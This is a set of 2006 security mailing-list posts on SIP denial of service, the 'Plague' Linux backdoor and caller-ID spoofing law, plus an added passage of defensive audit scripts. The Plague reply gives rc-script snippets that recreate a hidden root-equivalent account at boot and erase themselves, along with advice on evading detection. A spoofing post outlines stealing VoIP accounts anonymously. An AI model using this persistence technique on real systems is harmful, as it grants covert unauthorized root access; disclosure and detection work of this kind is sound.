The packets were crafted based on packetdumps from Wireshark with flags set for
pseudo-spoofing, ranDUMBized extensions, etc. The purpose of the tool was to
help me understand SIP security and Denial of Service attacks on the SIP
protocol. Originally I had intended on testing out my nCite Session Border
Controller but after watching nCite crash and burn on its own, it made little
sense for me to point it at it.

I have found that by sending a certain sequence of these packets, in a certain
order, servers react differently. Sometimes it crashed faster, sometimes more
extensions subscribed, sometimes voicemails were created and the list went on.
Asterisk version 1.2.13 and better are now patched from this issue but there
are other products it has not been tested on.

The packets were butchered in Perl and called from a shell script since I had
to manipulate packet sequences individually. This Proof of Concept program is
released to the public under the hopes that individuals will find a useful
purpose for assessing DoS vulnerabilities. It is unfortunate though that there
are idiots who will use this lame tool for malicious purposes.

Some vendors, CERT and other organizations were contacted as early as September
9th 2006 to address issues with their products. Most reacted quickly to get the
fixes in order.  Thanks to Kevin P. Flemming and the guys on Asterisk Dev for
creating a thread on this. Dan York for getting some to pay attention. PSIRT
at Cisco for looking into this, Tim Donahue for his perl pointers, vgersh99
(aka vlad) for nawk foo pointers, PHV, Annihilannic, p5wizard (segment!), and
Henning Schulzrinne for taking a look at the tool during his seminars at
Columbia.

Also thanks to Anthony LaMantia, Tzafir Cohen, and the others on the dev list
for tolerating my posts. Public apologies to Jay R. Ashworth for my mis-reading
of the (Missed)Trust in Caller ID thread on VOIPSA ;)

Coming 10/31/2006
http://www.infiltrated.net/asteroid/


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey 



Re: [Full-disclosure] Plague re-visited

2006-10-23 Thread J. Oquendo
[EMAIL PROTECTED] wrote:
 Hello Rik,
 and how on earth can you make root run that piece of code? Do you have
 to specify it in the README section that it is mandatory to run that as
 root in order the new application root will be installing to run as
 expected?


If you need someone to spell out how this works and how it maintains an account 
then you should unsubscribe from all security lists and search Google for 
Pokemon, change your hobby, get out of this field. From the onset nothing 
specified remote root access; it stated "proof of concept BACKDOOR". If you 
need the term defined for you, re-read the previous sentence in its entirety.

 Indeed, it is hard to tell what it actually does... unless you open your
 eyes and see "sed 's/root/something/g'" somewhere.


The purpose of me pondering this was a notion that one doesn't always need to 
re-invent the wheel. Using standard commands, it's actually easier and safer to 
maintain a backdoor. If someone already rooted a machine, how does one maintain 
that account without setting off bells and whistles? It's a lot easier to whip 
up little bits and pieces and have it precompile into one script, run itself, 
and delete itself afterwards. There would be no trace of any all-inclusive 
backdoor programs. A snippet here, a snippet there, all precompiling either on a 
system startup or shutdown.

 Either way, installing from hundreds of source files, can make even the
 best sys admin to not notice that part of the source code of the
 BACKDOOR-contagious application!


Really... Most system administrators don't even pay attention to log files. 
Most system administrators are so caught up with everyday work, putting out fires, 
configuring and maintaining systems, they don't have time to check a 500gb drive 
for a backdoor, and when they do, they're doing what, running chkrootkit? Using 
a method such as the one I described makes it much more difficult to detect a 
backdoor. As for seeing the word "root" and raising a red flag, don't make me 
laugh, see lines 2 and 4 below... Let's start in /etc/rc3.d...

echo file=`awk 'NR==59 {gsub(//,);print \$3}' /usr/include/paths.h`   
K1firstfile
echo echo sed -n '1p' \$file|sed 's/[^:]*:/new_account_name:/'  $file   
   K2nextfile
echo file2=`awk 'NR==74 {print \$8}' /usr/include/sysexits.h`  K3anotherfile
echo sed -n '1p' \$file2|sed 's/[^:]*:/new_account_name:/''  $file2  
K4endingfile
echo rm $file1 $file2  K5lastfileremove

Where one file depends on the next and so on and so forth. At the end of it all 
the backdoor files are removed, yet on startup (or shutdown depending on how 
its written), files are re-compiled and the account is recreated. The problem I 
see with many administrators and users nowadays, are they're not totally clued 
in... So you see file=`awk 'NR==59 {gsub(//,);print \$3}' 
/usr/include/paths.h` ... Unless you have K1firstfile checksummed, most 
wouldn't give it a second look.

 bad PLAGUE! bad intentions! bad people possibly putting that where root is
 messing.


I hope that comment was sarcasm and not stupidity...


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey 

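The post above describes the outcome of Plague rather than a string to grep for: an rc script copies root's /etc/passwd line under a new name, so a second UID-0 account returns at every boot while neither "root" nor "/etc/passwd" appears literally in the script. As an added example, not Plague's code and not the author's, here are two POSIX sh checks that catch that outcome: a passwd audit for extra UID-0 accounts and clones of root's entry, and a checksum snapshot of an rc directory that reports any dropped file such as K1firstfile. Every input is constructed in a temporary directory; sha256sum from GNU coreutils is assumed to be available.

```shell
#!/bin/sh
# Added example, not code from Plague or the thread. Two defender-side checks
# against the "copy root's passwd line under a new name from an rc script"
# technique. All inputs are constructed below in a temporary directory.

# Report accounts in a passwd-format file that are UID 0 but not root, and
# accounts whose UID, GID, home and shell are identical to root's, which is
# exactly what sed 's/[^:]*:/test:/' on root's line produces whatever the
# new name is. Output is sorted so callers can compare it verbatim.
audit_passwd() {
    awk -F: '
        $1 == "root"            { rootkey = $3 FS $4 FS $6 FS $7 }
        $1 != "root" && $3 == 0 { print "uid0-account:" $1 }
        $1 != "root"            { key[$1] = $3 FS $4 FS $6 FS $7 }
        END { for (u in key) if (key[u] == rootkey) print "root-clone:" u }
    ' "$1" | LC_ALL=C sort
}

# Checksum every file under an rc directory, in a stable order, so the
# result can be stored as a baseline.
rc_snapshot() {
    ( cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k2 )
}

# Compare a directory against a saved baseline. Prints one line per entry
# that is new or changed ("added-or-changed") or gone or changed
# ("missing-or-changed"); a modified file shows up as both.
rc_changes() {
    rc_snapshot "$1" | diff "$2" - \
        | sed -n 's/^> /added-or-changed: /p; s/^< /missing-or-changed: /p'
}

# Constructed fixtures: a small passwd file and an rc directory with one
# legitimate script, plus a baseline taken while the system is clean.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
printf 'root:x:0:0:root:/root:/bin/sh\n'               >  "$WORK/passwd"
printf 'bin:x:1:1:bin:/bin:/sbin/nologin\n'            >> "$WORK/passwd"
printf 'alice:x:1000:1000:Alice:/home/alice:/bin/sh\n' >> "$WORK/passwd"
mkdir "$WORK/rc3.d"
printf '#!/bin/sh\nexit 0\n' > "$WORK/rc3.d/S99local"
rc_snapshot "$WORK/rc3.d" > "$WORK/rc3.baseline"

# Simulate the backdoor's effect: root's line appended under the name "test"
# (the transformation the post shows) and a new file dropped into rc3.d.
sed -n '1p' "$WORK/passwd" | sed 's/[^:]*:/test:/' >> "$WORK/passwd"
printf 'placeholder: any new file here should be noticed\n' \
    > "$WORK/rc3.d/K1firstfile"

printf 'passwd audit:\n';  audit_passwd "$WORK/passwd"
printf 'rc3.d changes:\n'; rc_changes "$WORK/rc3.d" "$WORK/rc3.baseline"
```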


[Full-disclosure] Plague Proof of Concept Linux backdoor

2006-10-21 Thread J. Oquendo

Plague is an odd proof of concept backdoor keeping
tool based on the premise of using existing system
files and commands to keep and maintain a backdoor
on Linux systems. I could have modified this for
BSD, Solaris, etc., but I didn't feel like doing
the work...

http://www.infiltrated.net/plague


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey 



Re: [Full-disclosure] Hacker Pumpking Carving Contest

2006-10-17 Thread J. Oquendo

RSnake wrote:
Sorry for the spam but I wanted to get this out to as many haX0rs as 
possible with as few emails as possible.  It's time to get in the 
spirit.  It's time for a hacker pumpkin carving contest.  I've given you 
two weeks notice so no one can complain about not hearing about it in 
time.  Info at the following URL: http://ha.ckers.org/hacker-pumpkins/


-RSnake


  

Does this count?
lynx -dump http://infiltrated.net/foo|awk '{a[i++]=$0} END {for (j=i-1; 
j>=0;) print a[j--] }'|sed 's/\$/ /g;s/S/U/g'|awk '!($0 in a) {a[$0];print}'


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] Hacker Pumpking Carving Contest

2006-10-17 Thread J. Oquendo

RSnake wrote:
Sorry for the spam but I wanted to get this out to as many haX0rs as 
possible with as few emails as possible.  It's time to get in the 
spirit.  It's time for a hacker pumpkin carving contest.  I've given you 
two weeks notice so no one can complain about not hearing about it in 
time.  Info at the following URL: http://ha.ckers.org/hacker-pumpkins/


-RSnake


  

Uh... Windows (l)users need not apply... Retardo Linux/BSD users try:

lynx -dump http://infiltrated.net/foo|\
awk '{a[i++]=$0} END {for (j=i-1; j>=0;) print a[j--] }'|\
sed 's/\$/ /g;s/S/U/g'|\
awk '!($0 in a) {a[$0];print}'


;) Long time Rs

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] Fallacies on Truths in Caller ID scam

2006-10-09 Thread J. Oquendo

Ajay Pal Singh Atwal wrote:

Getting back to some very small points here...
  
Correction: Rawalpindi is not in India. 

  
Ralwapindi was used cause it's the only place that came to my mind at 
the moment, Pakistan, India it was an example.



If the call is from Dell, then does it matter, if the office is in India or 
Rawalpindi. 1800GO2DELL represents dell.
  
Yes it does matter to me where someone is located when I am speaking to 
them. It matters for the sake of accountability. YOU may not see nothing 
wrong with someone having your information at their fingertips, but I 
want to know who, what, where, when and why someone is doing ANYTHING 
with my information. Or haven't you been following news:


Indian Outsourcing Firms Downplay Fraud Concerns
http://www.crmbuyer.com/story/PZCY8ZqRWY32gK/Indian-Outsourcing-Firms-Downplay-Fraud-Concerns.xhtml

Fraud Reports Worry Indian Outsourcing Firms
http://www.ecommercetimes.com/story/8zIZdp07IuYkrW/Fraud-Reports-Worry-Indian-Outsourcing-Firms.xhtml

etc
http://tinyurl.com/g4mg5

I don't care if it's India, China, Pakistan, the North or South Pole, 
Dell in this example should follow US laws especially since they're 
located here. It can't be a single-sided law; it has to apply to all, 
bottom line.



And in that case www.talkety.com is doing something similar from Germany (?). 
And you can misuse their service to have fun making prank calls to people from 
their own numbers.

  
I don't care about Germany there fellow, this post was regarding US LAWS 
and I happened to mention a US COMPANY not a German one. I don't give a 
damn about it! (No really)



Just something for thought...


ahem..

  

Next argument?

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] Fallacies on Truths in Caller ID scam

2006-10-04 Thread J. Oquendo
Getting back to some points here...

So with let's say a vendor getting back to me on a problem I have, let the 
company be Dell for this example. Dell has their outsourced vendor from 
Ralwapindi India or somewhere in the vicinity call me, my caller ID shows 
1800GO2DELL, in this scenario either way you want to cut it, Dell is 
circumventing the Truth in Caller ID Act. 

As for telco's doing what they do greasing pockets, this has gone down since 
the evolution of business, money talks BS walks bottom line.

Valdis, to further iterate on your fallacious point: 

 The prosecutor can charge *each and every person involved* who is both

 a) within the US and
 b) took an identifiable action which lead to the event.

Let's create SpoofmyCallerIDforKicks.com and make a call (abbreviate the site 
to SCK.com for this example):

Spoofer(2125551212) -> SCK.com -> CallReceiver (4085551212)

SCK.com (posts call via Asterisk) -> routes through Russia to Level3 -> 
through Verizon -> through BellSouth -> Victim

SCK is in the Moldovia absolved from US laws. Should BellSouth bear the burden 
of the illegal action? This is what your statement is telling me. BellSouth, 
Verizon and Level3 are all to blame and since they cannot prosecute SCK being 
they're outside of US laws, you're inferring the US government 
can/will/should/have_the_option_to go after those responsible. Either way you 
want to cut this, Verizon, BellSouth and Level3 are as much to blame for not 
taking the proper checks.

Just something for thought...


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil infiltrated . net http://www.infiltrated.net

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey 



[Full-disclosure] Truths in Truth in Caller ID Act

2006-10-01 Thread J. Oquendo
So the United States government wants to pass the Truth in Caller ID act. 
Humorously it will do little to deter criminals from spoofing their caller ID 
and scamming innocent victims. Here is the rule/law followed by why it will 
fail:

"It shall be unlawful for any person within the United States, in connection 
with any telecommunications service or VOIP service, to cause any caller 
identification service to transmit misleading or inaccurate caller 
identification information, with the intent to defraud or cause harm."

Re-read it a few times and let some common sense kick in. "unlawful for any 
person within the United States, in connection with any telecommunications 
service or VOIP service, to cause any caller identification service to transmit 
misleading or inaccurate caller identification information" What in this bill 
exactly deters someone from abroad from continuing their activities? Firstly 
they're not bound by U.S. laws, secondly if their servers are abroad those 
servers are in their lawful means to do what is legally appropriate for their 
location.

Now argumentatively how will the United States seek to prosecute say a 
telemarketer from using a service abroad to traverse back into the U.S.? Let's 
re-read the letter of the law again shall we? "unlawful for any person within 
the United States, etc., etc., to cause any caller identification, etc., etc." 
So how does caller ID change, is it caused by the telemarketer, the server 
sending out the caller ID information, or the provider of that server? 
Obviously the telemarketer led the server to change the information, but 
ultimately the provider dished out the number, hence the provider being the 
true culprit.

The more I read about this law/rule/prohibition, the more I scratch my head at 
it.

So let's now see how the government intends on tracking someone shall we?

CallerIDBusterFoobar.com is a server located in Moscow. They're hosted there, 
their provider is there, their uplink is in Russia, etc. Joe Smith is a scumbag 
thief interested in stealing the credit card information of a few good men. 
He lives in Boondock Arizona and spends much too much time thinking up scams. 
He signs up for an account at CallerIDBusterFoobar.com, assigns 800-DISCOVER as 
his caller ID and proceeds to scam countless people out of their information. 
With this information he sets up fraudulent drops and pickups somewhere in 
Moldovia.

How will U.S. authorities track him down? They won't. They don't have access to 
the servers in Russia for starters, secondly how many people are reporting 
these crimes. Alright, let's be fair for a moment, someone at Discover 
discovers that the call actually originated from Russia. So what? Unless the 
foreign country is cooperating with U.S. authorities, there is little the 
United States government with all their so called legislation would be able to 
do.

Now let's take it a step further, Joe Smith decided to use Privoxy with a WiFi 
phone from an open network. He managed to steal a VoIP account while scanning a 
class A for port 5060 and leveraged someone's information. He has always used 
Tor and Privoxy on his personal distro of Linux on a CD so he knows that there 
will be no residue from his crimes due to him using this CD on this machine, so 
he is scot-free technologically.

How does the United States intend on stopping him again? I get it now, since 
the United States government in all of their mighty wisdom is passing this bill 
it is only obvious that criminals are going to respect U.S. laws, I mean after 
all those in government follow their own laws so why shouldn't a criminal.

Comments, criticism?

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil infiltrated . net http://www.infiltrated.net

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey 


